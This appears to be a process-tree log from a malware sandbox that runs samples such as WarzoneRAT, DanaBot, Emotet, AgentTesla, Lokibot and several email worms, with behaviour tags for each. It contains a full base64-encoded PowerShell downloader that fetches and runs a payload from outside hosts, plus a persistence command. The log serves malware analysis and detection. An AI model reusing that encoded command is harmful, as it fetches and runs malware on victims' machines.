        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE066.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB3813E3F5C8B46CEA556CFAA1E833EB.TMP"
        6⤵
        
        PID:3572
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ezc3pxlv.cmdline"
        5⤵
        
        PID:3904
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE102.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc7B4FF5D59CA04EA59F5DBB31604FE575.TMP"
        6⤵
        
        PID:5960
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xurfbixc.cmdline"
        5⤵
        
        PID:2436
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE19F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6FE21816D75444C3ADB08ACA965494A6.TMP"
        6⤵
        
        PID:1832
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\6bzh2s2i.cmdline"
        5⤵
        
        PID:776
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE21C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcBA947B1EE7B1493BBF5AB36385584DBC.TMP"
        6⤵
        
        PID:236
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\1rdtsct0.cmdline"
        5⤵
        
        PID:1364
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE2C8.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA1801E888347435D8F8CD8D59146EBF2.TMP"
        6⤵
        
        PID:2492
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\dyyq1ra7.cmdline"
        5⤵
        
        PID:3204
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE364.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc8E5FBFFD48C84106836A762F2D335E0.TMP"
        6⤵
        
        PID:1456
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\sbvfigkf.cmdline"
        5⤵
        
        PID:2864
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE41F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc272F0621866248ED88F9D8F2D915816D.TMP"
        6⤵
        
        PID:4680
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\aa0wjsfh.cmdline"
        5⤵
        
        PID:2020
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4692.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc27D2D5C2C9CE4DB387B13E5CB1652517.TMP"
        6⤵
        
        PID:5224
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\dovz87cb.cmdline"
        5⤵
        
        PID:1592
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES473E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc35F21DC913AB4C7FA6A1F1CF22474A1.TMP"
        6⤵
        
        PID:4940
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\4vud63rd.cmdline"
        5⤵
        
        PID:5260
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES479C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc904D85E2B95841D3ABAB4DC4F95964DD.TMP"
        6⤵
        
        PID:3200
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\bicgi6gv.cmdline"
        5⤵
        
        PID:5980
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5156
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4838.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9864E26696F041B9AFD5E779156A17DD.TMP"
        6⤵
        
        PID:1464
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qvw8qwhe.cmdline"
        5⤵
        
        PID:1684
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES48E4.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc754ECF4261434629A8949D974A8864F3.TMP"
        6⤵
        
        PID:2884
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\s13lm_-y.cmdline"
        5⤵
        
        PID:5228
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAB38.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCE8269C158EA47AC9C38A1F15D6ECCD5.TMP"
        6⤵
        
        PID:4664
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kkzxinvs.cmdline"
        5⤵
        
        PID:5124
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABD4.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc166397B52DA647FBA5B29FC534CA9B61.TMP"
        6⤵
        
        PID:2684
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wixmgqot.cmdline"
        5⤵
        
        PID:3040
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAC9F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc15A21497664A48CD94683BE78AD554C9.TMP"
        6⤵
        
        PID:2496
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\i6tkxe2p.cmdline"
        5⤵
        
        PID:2372
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD4B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc8D30BC7F8C5B4997878E2A024E4B9F0.TMP"
        6⤵
        
        PID:6056
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\remnhnrk.cmdline"
        5⤵
        
        PID:4396
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF80.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc931F3D30DEF1495C83C8F335A1D7B4BF.TMP"
        6⤵
        
        PID:952
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lcpnjyxy.cmdline"
        5⤵
        
        PID:5172
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES103B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc7222891354E4A8FBF6788CB34A04FD2.TMP"
        6⤵
        
        PID:1616
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xxsyzlqu.cmdline"
        5⤵
        
        PID:236
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES10C8.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5278C4EA65EC43D0B9D411C7C08D1131.TMP"
        6⤵
        
        PID:568
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mrt5ztvi.cmdline"
        5⤵
        
        PID:5396
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1184.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFE1896C9989249DDB267CD51E59DB074.TMP"
        6⤵
        
        PID:4780

C:\Users\Admin\Desktop\VanToM-Rat.bat
"C:\Users\Admin\Desktop\VanToM-Rat.bat"
1⤵
- Adds Run key to start application
- NTFS ADS
- Suspicious use of SetWindowsHookEx
PID:2384
- C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe
  "C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of SetWindowsHookEx
  PID:4616

C:\Users\Admin\Desktop\WarzoneRAT.exe
"C:\Users\Admin\Desktop\WarzoneRAT.exe"
1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
PID:3864
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jFvfxe" /XML "C:\Users\Admin\AppData\Local\Temp\tmp93D5.tmp"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4892
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4764

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe"
1⤵
PID:3496
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 300
  2⤵
  - Program crash
  PID:1416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3496 -ip 3496
1⤵
PID:3500

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Temp1_Emotet.zip\TheG0df2ther@Emotet.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5596
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:5928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4068

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Axam.a.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Axam.a.exe"
1⤵
- Drops startup file
- Adds Run key to start application
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5244

C:\Users\Admin\AppData\Roaming\Axam.exe
"C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Anap.a.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5424

C:\Users\Admin\AppData\Roaming\Axam.exe
"C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Bugsoft.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\BubbleBoy.html
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:5464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd0c6d3cb8,0x7ffd0c6d3cc8,0x7ffd0c6d3cd8
  2⤵
  PID:5336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,6406408280028872494,7700844364304131260,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1864 /prefetch:2
  2⤵
  PID:4948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1852,6406408280028872494,7700844364304131260,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:3
  2⤵
  PID:2796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1852,6406408280028872494,7700844364304131260,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2676 /prefetch:8
  2⤵
  PID:928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6406408280028872494,7700844364304131260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
  2⤵
  PID:2952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6406408280028872494,7700844364304131260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
  2⤵
  PID:1832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1852,6406408280028872494,7700844364304131260,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 /prefetch:8
  2⤵
  PID:5304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6406408280028872494,7700844364304131260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2492 /prefetch:1
  2⤵
  PID:1560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6406408280028872494,7700844364304131260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1
  2⤵
  PID:204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6406408280028872494,7700844364304131260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3552 /prefetch:1
  2⤵
  PID:1076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6406408280028872494,7700844364304131260,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
  2⤵
  PID:1068

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4244

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4668

C:\Users\Admin\AppData\Roaming\Axam.exe
"C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Funsoul.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4668

C:\Users\Admin\AppData\Roaming\Axam.exe
"C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Gruel.a.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3100

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Emin.js"
1⤵
PID:4960

C:\Users\Admin\AppData\Roaming\Axam.exe
"C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Nyxem.E.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4016

C:\Users\Admin\AppData\Roaming\Axam.exe
"C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Pikachu.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1268

C:\Users\Admin\AppData\Roaming\Axam.exe
"C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\AgentTesla.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5976

C:\Users\Admin\AppData\Roaming\Axam.exe
"C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\butterflyondesktop.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5504

C:\Users\Admin\AppData\Roaming\Axam.exe
"C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Lokibot.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:252

C:\Users\Admin\AppData\Roaming\Axam.exe
